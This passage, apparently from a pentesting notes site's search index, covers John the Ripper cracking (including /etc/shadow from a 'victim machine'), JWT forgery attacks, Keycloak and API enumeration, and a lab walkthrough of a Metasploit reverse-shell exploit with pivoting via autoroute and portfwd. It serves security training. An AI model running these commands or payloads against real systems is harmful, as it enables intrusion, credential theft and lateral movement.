    Run from within CMD shell and write out to screen.

    CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1\n

    Run from within PS Shell and write out to file.

    PS C:\\temp> .\\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt\n
    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"john-the-ripper/","title":"John the Ripper - A hash cracker and dictionary attack tool","text":"

    John the Ripper (JTR or john) is one of those tools that can be used for several things: you can crack a hash and you can crack a file.

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#installation","title":"Installation","text":"

    Download from: https://www.openwall.com/john/.

    --list=formats // gives you a list of the formats

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-hash","title":"Crack a hash","text":"","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-single-crack-mode-attack","title":"Hash: Single Crack Mode attack","text":"
    john --format=sha256 hashes_to_crack.txt\n# --format=sha256: specifies that the hash format is SHA-256\n# hashes_to_crack.txt:  is the file name containing the hashes to be cracked \n

    John will output the cracked passwords to the console and the file \"john.pot\" (~/.john/john.pot) to the current user's home directory.

    Furthermore, it will continue cracking the remaining hashes in the background, and we can check the progress by running:

    john --show \n

    Cheat sheet:

    Hash Format Example Command Description afs john --format=afs hashes_to_crack.txt AFS (Andrew File System) password hashes bfegg john --format=bfegg hashes_to_crack.txt bfegg hashes used in Eggdrop IRC bots bf john --format=bf hashes_to_crack.txt Blowfish-based crypt(3) hashes bsdi john --format=bsdi hashes_to_crack.txt BSDi crypt(3) hashes crypt(3) john --format=crypt hashes_to_crack.txt Traditional Unix crypt(3) hashes des john --format=des hashes_to_crack.txt Traditional DES-based crypt(3) hashes dmd5 john --format=dmd5 hashes_to_crack.txt DMD5 (Dragonfly BSD MD5) password hashes dominosec john --format=dominosec hashes_to_crack.txt IBM Lotus Domino 6/7 password hashes EPiServer SID hashes john --format=episerver hashes_to_crack.txt EPiServer SID (Security Identifier) password hashes hdaa john --format=hdaa hashes_to_crack.txt hdaa password hashes used in Openwall GNU/Linux hmac-md5 john --format=hmac-md5 hashes_to_crack.txt hmac-md5 password hashes hmailserver john --format=hmailserver hashes_to_crack.txt hmailserver password hashes ipb2 john --format=ipb2 hashes_to_crack.txt Invision Power Board 2 password hashes krb4 john --format=krb4 hashes_to_crack.txt Kerberos 4 password hashes krb5 john --format=krb5 hashes_to_crack.txt Kerberos 5 password hashes LM john --format=LM hashes_to_crack.txt LM (Lan Manager) password hashes lotus5 john --format=lotus5 hashes_to_crack.txt Lotus Notes/Domino 5 password hashes md4-gen john --format=md4-gen hashes_to_crack.txt Generic MD4 password hashes md5 john --format=md5 hashes_to_crack.txt MD5 password hashes md5-gen john --format=md5-gen hashes_to_crack.txt Generic MD5 password hashes mscash john --format=mscash hashes_to_crack.txt MS Cache password hashes mscash2 john --format=mscash2 hashes_to_crack.txt MS Cache v2 password hashes mschapv2 john --format=mschapv2 hashes_to_crack.txt MS CHAP v2 password hashes mskrb5 john --format=mskrb5 hashes_to_crack.txt MS Kerberos 5 password hashes mssql05 john --format=mssql05 hashes_to_crack.txt MS SQL 2005 password hashes mssql john --format=mssql hashes_to_crack.txt MS SQL password hashes mysql-fast john --format=mysql-fast hashes_to_crack.txt MySQL fast password hashes mysql john --format=mysql hashes_to_crack.txt MySQL password hashes mysql-sha1 john --format=mysql-sha1 hashes_to_crack.txt MySQL SHA1 password hashes NETLM john --format=netlm hashes_to_crack.txt NETLM (NT LAN Manager) password hashes NETLMv2 john --format=netlmv2 hashes_to_crack.txt NETLMv2 (NT LAN Manager version 2) password hashes NETNTLM john --format=netntlm hashes_to_crack.txt NETNTLM (NT LAN Manager) password hashes NETNTLMv2 john --format=netntlmv2 hashes_to_crack.txt NETNTLMv2 (NT LAN Manager version 2) password hashes NEThalfLM john --format=nethalflm hashes_to_crack.txt NEThalfLM (NT LAN Manager) password hashes md5ns john --format=md5ns hashes_to_crack.txt md5ns (MD5 namespace) password hashes nsldap john --format=nsldap hashes_to_crack.txt nsldap (OpenLDAP SHA) password hashes ssha john --format=ssha hashes_to_crack.txt ssha (Salted SHA) password hashes NT john --format=nt hashes_to_crack.txt NT (Windows NT) password hashes openssha john --format=openssha hashes_to_crack.txt OPENSSH private key password hashes oracle11 john --format=oracle11 hashes_to_crack.txt Oracle 11 password hashes oracle john --format=oracle hashes_to_crack.txt Oracle password hashes pdf john --format=pdf hashes_to_crack.txt PDF (Portable Document Format) password hashes phpass-md5 john --format=phpass-md5 hashes_to_crack.txt PHPass-MD5 (Portable PHP password hashing framework) password hashes phps john --format=phps hashes_to_crack.txt PHPS password hashes pix-md5 john --format=pix-md5 hashes_to_crack.txt Cisco PIX MD5 password hashes po john --format=po hashes_to_crack.txt Po (Sybase SQL Anywhere) password hashes rar john --format=rar hashes_to_crack.txt RAR (WinRAR) password hashes raw-md4 john --format=raw-md4 hashes_to_crack.txt Raw MD4 password hashes raw-md5 john --format=raw-md5 hashes_to_crack.txt Raw MD5 password hashes raw-md5-unicode john --format=raw-md5-unicode hashes_to_crack.txt Raw MD5 Unicode password hashes raw-sha1 john --format=raw-sha1 hashes_to_crack.txt Raw SHA1 password hashes raw-sha224 john --format=raw-sha224 hashes_to_crack.txt Raw SHA224 password hashes raw-sha256 john --format=raw-sha256 hashes_to_crack.txt Raw SHA256 password hashes raw-sha384 john --format=raw-sha384 hashes_to_crack.txt Raw SHA384 password hashes raw-sha512 john --format=raw-sha512 hashes_to_crack.txt Raw SHA512 password hashes salted-sha john --format=salted-sha hashes_to_crack.txt Salted SHA password hashes sapb john --format=sapb hashes_to_crack.txt SAP CODVN B (BCODE) password hashes sapg john --format=sapg hashes_to_crack.txt SAP CODVN G (PASSCODE) password hashes sha1-gen john --format=sha1-gen hashes_to_crack.txt Generic SHA1 password hashes skey john --format=skey hashes_to_crack.txt S/Key (One-time password) hashes ssh john --format=ssh hashes_to_crack.txt SSH (Secure Shell) password hashes sybasease john --format=sybasease hashes_to_crack.txt Sybase ASE password hashes xsha john --format=xsha hashes_to_crack.txt xsha (Extended SHA) password hashes zip john --format=zip hashes_to_crack.txt ZIP (WinZip) password hashes","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-wordlist-mode-attack","title":"Hash: Wordlist mode attack","text":"
    john --wordlist=<wordlist_file> --rules <hash_file>\n

    Multiple wordlists can be specified by separating them with a comma.

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-incremental-mode-attack","title":"Hash: Incremental mode attack","text":"

    Incremental Mode is an advanced John mode used to crack passwords using a character set. It is a hybrid attack, which means it will attempt to match the password by trying all possible combinations of characters from the character set. This mode is the most effective yet most time-consuming of all the John modes.

    john --incremental <hash_file>\n

    Additionally, it is important to note that the default character set is limited to a-zA-Z0-9. Therefore, if we attempt to crack complex passwords with special characters, we need to use a custom character set.

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-file","title":"Crack a file","text":"

    For cracking files you have the following tools:

    Tool Description pdf2john Converts PDF documents for John ssh2john Converts SSH private keys for John mscash2john Converts MS Cash hashes for John keychain2john Converts OS X keychain files for John rar2john Converts RAR archives for John pfx2john Converts PKCS#12 files for John truecrypt_volume2john Converts TrueCrypt volumes for John keepass2john Converts KeePass databases for John vncpcap2john Converts VNC PCAP files for John putty2john Converts PuTTY private keys for John zip2john Converts ZIP archives for John hccap2john Converts WPA/WPA2 handshake captures for John office2john Converts MS Office documents for John wpa2john Converts WPA/WPA2 handshakes for John

    If you need addional ones, run:

    locate *2john*\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#basic-usage","title":"Basic usage","text":"
    # Syntax. Three steps:\n# 1. Extract hash from file\n<tool> <file_to_crack> > file.hash\n# 2. Crack the hash\njohn file.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> file.hash \n\n# Example with a pdf:\n# 1. Extract hash from file\npdf2john server_doc.pdf > server_doc.hash\n# 2. Crack the hash\njohn server_doc.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> server_doc.hash \n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

    First, save /etc/passwd and john /etc/shadow from the victim machine to the attacker machine.

    Second, use unshadow to put users and passwords in the same file:

    unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

    Third, run johtheripper. You can use a list of users or specific ones brute force:

    john -incremental -users:<userList> <fileToCrack>\n\n# To display the passwords recovered:\njohn --show crackme\n\n# Default path to cracked password: /root/.john/john.pot\n\n# Dictionary attack\njohn -wordlist=<file> -users=victim1,victim2 -rules <filetocrack>\n# -rules parameter adds som mangling to the wordlist\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
    cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\ncat hash\njohn --wordlist=/root/Desktop/wordlists/1000000-password-seclists.txt hash\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-a-zip-file","title":"Cracking password of a zip file","text":"
    zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"jwt-tool/","title":"JWT tool","text":""},{"location":"jwt-tool/#jwt-attacks","title":"JWT attacks","text":"

    Two tools: jwt.io and jwt_tools.

    To see a jwt decoded on your CLI:

    jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk\n1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug \n

    Result:

    Also, to see the decoded jwt, knowing that is encoded in base64, we could echo each of its parts:

    echo eyJhbGciOiJIUzUxMiJ9 | base64 -d  && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0\nIjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

    Results:

    {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

    To run a JWT scan with jwt_tool, run:

    jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n

    Example:

    Some more jwt_tool flags that may come in hand:

    # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
    "},{"location":"jwt-tool/#the-none-attack","title":"The none attack","text":"

    A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

    To craft a jwt with \"none\" as the value for \"alg\", run:

    jwt_tool <JWT_Token> -X a\n
    "},{"location":"jwt-tool/#the-null-signature-attack","title":"The null signature attack","text":"

    Second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether and leaving the last period in place.

    "},{"location":"jwt-tool/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

    Launching this attack is relatively simple. Just remove the password value from the payload and leave it in blank. Then, regenerate the jwt.

    Also, with jwt_tool, run:

    jwt_tool <JWT_Token> -X b\n
    "},{"location":"jwt-tool/#the-algorithm-switch-or-key-confusion-attack","title":"The algorithm switch (or key-confusion) attack","text":"

    A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

    jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
    "},{"location":"jwt-tool/#the-jwt-crack-attack","title":"The jwt crack attack","text":"

    JWT_Tool can still test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

    jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

    You can generate this wordlist for the secret signature of the json web token by using crunch.

    Once you crack the secret of the signature, we can create our own trusted tokens. 1. Grab another user email (in the crapi app, from the data exposure vulnerability when getting the forum (GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.

    "},{"location":"jwt-tool/#spoofing-jwks","title":"Spoofing JWKS","text":"

    Specify JWS URL with -ju, or set in jwtconf.ini to automate this attack.

    "},{"location":"jwt-tool/#inject-inline-jwks","title":"Inject inline JWKS","text":""},{"location":"kernel-vulnerability-exploitation/","title":"Kernel vulnerability exploitation","text":"System vulnerability Exploit Ubuntu 16.04 LTS Exploit 39772 Ubuntu 18.04 LTS + lxd lxd privilege escalation","tags":["pentesting","privilege escalation","linux"]},{"location":"keycloak-pentesting/","title":"Pentesting Keycloak","text":"

    Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.

    Sources
    • https://www.surecloud.com/resources/blog/pentesting-keycloak-part-1
    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#fingerprint-and-enumeration","title":"Fingerprint and enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#keycloak-running","title":"Keycloak running...","text":"

    For assessing an environment running Keycloak, we will need first to fingerprint it, meaning to identify that we are facing a keycloak implementation and to determine which version is. For that:

    1. Cookie Name \u2013 Once logged in with valid credentials, pay attention to cookies.
    2. URLs: Keycloak has a very distinctive URL.
    3. JWT Payload: Even if this is an OAuth requirement, the JWT could also give you a hint that you\u2019re using Keycloak, just by looking at sections like \u2018resource_access\u2019 and \u2018scope\u2019.
    4. Page Source: Finally, you might also find references of /keycloak/ in the source code of the login page.
    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#version","title":"Version","text":"

    At the moment, there is no way to identify the running Keycloak version by looking at it from an unauthenticated perspective. The only way is via an administrative account (with the correct JWT token in the request header): GET /auth/admin/serverinfo.

    The latest stable version of Keycloak is available at https://www.keycloak.org/downloads \u2013 Make sure the client is running the latest. If not, check if there are public CVEs and/or exploits on:

    https://repology.org/project/keycloak/cves https://www.cvedetails.com/version-list/16498/37999/1/Keycloak-Keycloak.html https://www.exploit-db.com/

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#openid-configuration-saml-descriptor","title":"OpenID Configuration / SAML Descriptor","text":"
    /auth/realms/<realm_name>/.well-known/openid-configuration /auth/realms/<realm_name>/protocol/saml/descriptor\n

    For public keys:

    /auth/realms/<realm_name>/\n
    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#realms","title":"Realms","text":"

    A realm manages a set of users, credentials, roles, and groups. A user belongs to and logs into a realm. Realms are isolated from one another and can only manage and authenticate the users that they control.

    When you boot Keycloak for the first time, Keycloak creates a pre-defined realm for you. This initial realm is the master realm \u2013 the highest level in the hierarchy of realms. Admin accounts in this realm have permissions to view and manage any other realm created on the server instance. When you define your initial admin account, you create an account in the master realm. Your initial login to the admin console will also be via the master realm.

    It is not recommended to configure a web application\u2019s SSO on the default master realm for security and granularity. Realms can be easily enumerated, but that\u2019s a default behaviour of the platform. Obtaining a list of valid realms might be useful later on in the assessment.

    It is possible to enumerate via Burp Suite Intruder on the following URL:

    /auth/realms/<realm_name>/\n

    A possible dictionary: https://raw.githubusercontent.com/chrislockard/api_wordlist/master/objects.txt.

    Realms can be configured to allow user self-registration. This is not an issue itself and is often advertised in the login page:

    If the application is using a custom template for the login page, hiding the registration link, we can still try to directly access the registration link, which is:

    /auth/realms//login-actions/registration?client_id=&tab_id=

    Of course, disabling self-registration in a production environment is recommended.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#clients-id","title":"Clients ID+","text":"

    Clients are entities that can request Keycloak to authenticate a user. Most often, clients are applications and services that want to use Keycloak to secure themselves and provide a single sign-on solution. Clients can also be entities that just want to request identity information or an access token so that they can securely invoke other services on the network that Keycloak secures.

    Each realm (identified below) might have a different set of client ids.

    When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

    /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

    We can use here some dictionaries.

    Additionally, the following default client ids should also be available upon Keycloak installation:

    account\naccount-console\naccounts\naccounts-console\nadmin\nadmin-cli\nbroker\nbrokers\nrealm-management\nrealms-management\nsecurity-admin-console\n

    No HTTP response code could help us to identify a valid client_id from a wrong one. We should focus on whether the length of the response differs from the majority of the responses.

    This process should be repeated for each valid realm identified in previous steps.

    Clients can be configured with different Access Types:

    • Bearer-Only\u00a0\u2013 Used for backend servers and API (requests that already contain a token/secret in the request header)
    • Public\u00a0\u2013 Able to initiate login flaw (Auth flow to get an access token) and does not hold or send any secrets
    • Confidential\u00a0\u2013 Used for backend servers and able to initiate login flaw. Can accept or send secrets.

    Therefore, when we encounter a \u201cclient_secret\u201d parameter in the login request, we\u2019re probably looking at a client with a Confidential or Bearer-Only Access Type.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#scopes","title":"Scopes","text":"

    When a client is registered, you must define protocol mappers and role scope mappings for that client. It is often useful to store a client scope to make creating new clients easier by sharing some common settings. This is also useful for requesting some claims or roles to be conditionally based on the value of the scope parameter. Keycloak provides the concept of a client scope for this.

    When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

    /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

    It is possible to identify additional scopes via Burp Suite Intruder, by keeping all the other parameters with the same value:

    The following, additional, default scopes should also be available upon KeyCloak installation:

    address  \naddresses  \nemail  \nemails  \nmicroprofile-jwt  \noffline_access  \nphone  \nopenid  \nprofile  \nrole_list  \nroles  \nrole  \nweb-origin  \nweb-origins\n

    It is quite straight forward to identify valid scopes from non-valid scopes by looking at the content length or status code.

    This process should be repeated for each realm identified in previous steps.

    It should be noted that valid scopes can be concatenated within the URL prior of the login, e.g.:

    ...&scope=openid+offline_access+roles+email+phone+profile+address+web-origins&...

    This will \u2018force\u2019 Keycloak to grant any available/additional scope, for such realm \u2013 but also depending on the user\u2019s role configuration.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#grants","title":"Grants","text":"

    OAuth 2 provides several \u2018grant types\u2019 for different use cases. The grant types defined are:

    • Authorization Code for apps running on a web server, browser-based and mobile apps
    • Password for logging in with a username and password (only for first-party apps)
    • Client credentials for application access without a user present
    • Implicit was previously recommended for clients without a secret, but has been superseded by using the Authorization Code grant with PKCE

    A good resource to understand use cases of grants is available from\u00a0Aaron Parecki.\u00a0

    Grants cannot be enumerated and are as follow:

    authorization_code password client_credentials refresh_token implicit urn:ietf:params:oauth:grant-type:device_code urn:openid:params:grant-type:ciba

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider","title":"Identity Provider","text":"

    Keycloak can be configured to delegate authentication to one or more Identity Providers (IDPs). Social login via Facebook or Google+ is an example of an identity provider federation. You can also hook Keycloak to delegate authentication to any other OpenID Connect or SAML 2.0 IDP.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider-enumeration","title":"Identity Provider Enumeration","text":"

    There are a number of external identity providers that can be configured within Keycloak. The URL to use within Intruder is:

    /auth/realms//broker//endpoint

    The full list of default IDP names is as follow:

    gitlab github facebook google linkedin instagram microsoft bitbucket twitter openshift-v4 openshift-v3 paypal stackoverflow saml oidc keycloak-oidc

    Once again, the status codes might differ, but the length will disclose which IDP is enabled. It should be noted that, by default, the login page will disclose which IDPs are enabled:

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#roles","title":"Roles","text":"

    Roles identify a type or category of user. Admin, user, manager, and employee are all typical roles that may exist in an organization. Applications often assign access and permissions to specific roles rather than individual users as dealing with users can be too fine-grained and hard to manage.

    Roles cannot be easily enumerated from an unauthenticated perspective. They are usually visible within the JWT token of the user upon successful login:

    The above image shows that \u2018account\u2019 client_id has, by default, 2 roles.

    Realm Default Roles:

    default-roles- offline_access uma_authorization

    Client ID Default Roles:

    manage-account manage-account-links delete-account manage-content view-applications view-consent view-profile read-token create-client impersonation manage-authorization manage-clients manage-events

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#user-email-enumeration-auth","title":"User Email Enumeration (auth)","text":"

    It is possible to enumerate valid email addresses from an authenticated perspective via Keycloak\u2019s account page (if enabled for the logged-in user), available at:

    /auth/realms//account/#/personal-info

    When changing the email address to an already existing value, the system will return 409 Conflict. If the email is not in use, the system will return \u2018204 \u2013 No Content\u2019. Please note that, if Email Verification is enabled, this will send out a confirmation email to all email addresses we\u2019re going to test.

    This process can be easily automated via Intruder and no CSRF token is needed to perform this action:

    If the template of the account console was changed to not show the personal information page, you might want to try firing up the request via:

    POST /auth/realms//account/ HTTP/1.1 Host: Content-Type: application/json Authorization: Bearer Origin: Content-Length: 635 Connection: close Cookie:

    { \"id\": \"\", \"username\": \"myuser\", \"firstName\": \"my\", \"lastName\": \"user\", \"email\": \"\", \"emailVerified\": false, \"userProfileMetadata\": { \"attributes\": [ { \"name\": \"username\", \"displayName\": \"${username}\", \"required\": true, \"readOnly\": true, \"validators\": {} }, { \"name\": \"email\", \"displayName\": \"${email}\", \"required\": true, \"readOnly\": false, \"validators\": { \"email\": { \"ignore.empty.value\": true } } }, { \"name\": \"firstName\", \"displayName\": \"${firstName}\", \"required\": true, \"readOnly\": false, \"validators\": {} }, { \"name\": \"lastName\", \"displayName\": \"${lastName}\", \"required\": true, \"readOnly\": false, \"validators\": {} } ] }, \"attributes\": { \"locale\": [ \"en\" ] } }

    The valid email addresses identified in this process can be used to perform brute force (explained in the exploitation part of the Pentesting Keyclock Part Two). For this reason, access to the Keycloak\u2019s account page should be disabled.

    ","tags":["wordpress","keycloak"]},{"location":"kiterunner/","title":"Kiterunner","text":"

    Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute force tools like Gobuster/Dirbuster/ work to discover URL paths, it typically relies on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

    1. First, download the dictionaries from the project. In my case I downloaded it to /usr/share/wordlists/kiterunner/:

    2. https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz

    3. https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
    4. https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
    5. https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

    6. Run a quick scan of your target\u2019s URL or IP address like this:

    kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

    But. Note that we conducted this scan without any authorization headers, which the target API likely requires.

    To use a dictionary (and not a kite file):

    kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

    If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

    One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

    kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

    Running this will replay the request and provide you with the HTTP response.

    To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

    kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
    "},{"location":"knockpy/","title":"knockpy - A subdomain scanner","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#installation","title":"Installation","text":"

    Repository: https://github.com/guelfoweb/knock

    git clone https://github.com/guelfoweb/knock.git\ncd knock\npip3 install -r requirements.txt\n\n# Optional: Make an alias for knockpy\nsudo chmod +x knockpy.py \nsudo ln -s /home/kali/tools/knock/knockpy.py /usr/bin/knockpy\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#usage","title":"Usage","text":"
    # From the tools/knock folder\npython3 knockpy.py <DOMAIN>\n\n# If you have made an alias, just run:\nknockpy <domain>\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"lateral-movements/","title":"Lateral movements","text":"","tags":["pentesting"]},{"location":"lateral-movements/#using-metasploit","title":"using metasploit","text":"
    1. Get our ip
    ip a\u00a0\n# 192.64.166.2\n
    1. Get machine ip\u00a0
    ping demo.ine.local\n# 192.64.166.3\n
    1. Enumerate services in the target machine
    nmap -sV -sS -O 192.64.166.3\n# open ports: 80 and 3306.\n
    1. Go further on port 80
    nmap\u00a0\n# In the scan you will see: V-CMS-Powered by V-CMS\u00a0 and PHPSESSID: httponly flag not set\n
    1. Launch metasploit and search for v-cms
    service postgresql start\nmsfconsole -q\n
    search v-cms\n
    1. Use the exploit exploit/linux/http/vcms_upload, configure it and run it
    use exploit/linux/http/vcms_upload\nshow options\n
    set RHOST 192.64.166.3\nset TARGETURI /\nset LHOST 192.64.166.2\nset payload php/meterpreter/reverse_tcp\nrun\n
    1. You will get a limited meterpreter. Access to the shell and print the flag
    meterpreter> shell\n> cat /root/flag.txt\n# 4f96a3e848d233d5af337c440e50fe3d\n
    1. Map other possible interfaces in the machine. Since ifconfig does not work, spawn the shell and try again
    ifconfig\u00a0\n# does not work\n
    ipconfig\n# does not work\n
    which python\n# it\u2019s located under /bin, so we can use python to spawn the shell\n
    python -c 'import pty; pty.spawn(\"/bin/bash\")'\n
    $root@machine> ifconfig\n# it tells us about another interface: 192.182.147.2\n
    ","tags":["pentesting"]},{"location":"lateral-movements/#route","title":"route","text":"
    1. Add tunnel from interface 192.64.166.3 (which is session 1 of meterpreter) and the discovered interface, 192.182.147.2 with the utility route:
    $root@machine> exit\n
    meterpreter> run autoroute -s 192.182.147.0 -n 255.255.255.0\n# you can also add a route out of the meterpreter. In that case you need to specify the meterpreter session: route add 192.182.147.0 .0 255.255.255.0 1\n
    1. Background the meterpreter session and check if the route is added successfully to the metasploit's routing table.
    meterpreter> background\nmsf> route print\n
    1. Run auxiliary TCP port scanning module to discover any available hosts (From IP .3 to .10). And, if any of ports 80, 8080, 445, 21 and 22 are open on those hosts.
    msf> use auxiliary/scanner/portscan/tcp\n\nmsf\u00a0 auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22\n\nmsf\u00a0 auxiliary/scanner/portscan/tcp > set RHOSTS 192.69.228.3-10\n\nmsf\u00a0 auxiliary/scanner/portscan/tcp > exploit\n# Give us ports 21 and 22 open at 192.182.147.3\n
    ","tags":["pentesting"]},{"location":"lateral-movements/#portfwd","title":"portfwd","text":"
    1. In order to reach the discovered target, we need to fordward remote machine port to the local machine port. We want to target port 21 of that machine so we will forward remote port 21 to the local port 1234. This is done with the utility portfwd from meterpreter
    msf\u00a0 auxiliary/scanner/portscan/tcp > sessions -i 1\n\nmeterpreter> portfwd\n# Tell you  there is none configured\n\nmeterpreter> portfwd add -l 1234 -p 21 -r 192.182.147.3\n# -l: local port \n# -p 21 The port we are targeting in our attack \n# -r the remote host\n\nmeterpreter> portfwd list\n# It tells the active Port Forwards. Now, scan the local port using Nmap\n
    1. Run nmap on the forwarded local port to identify the service name
    meterpreter> background\n\nmsf> nmap -sS -sV -p 1234 localhost\n# It tells you the ftp version: vsftpd 2.0.8 or later\n
    1. Search for vsftpd exploit module and exploit the target host using vsftpd backdoor exploit module.
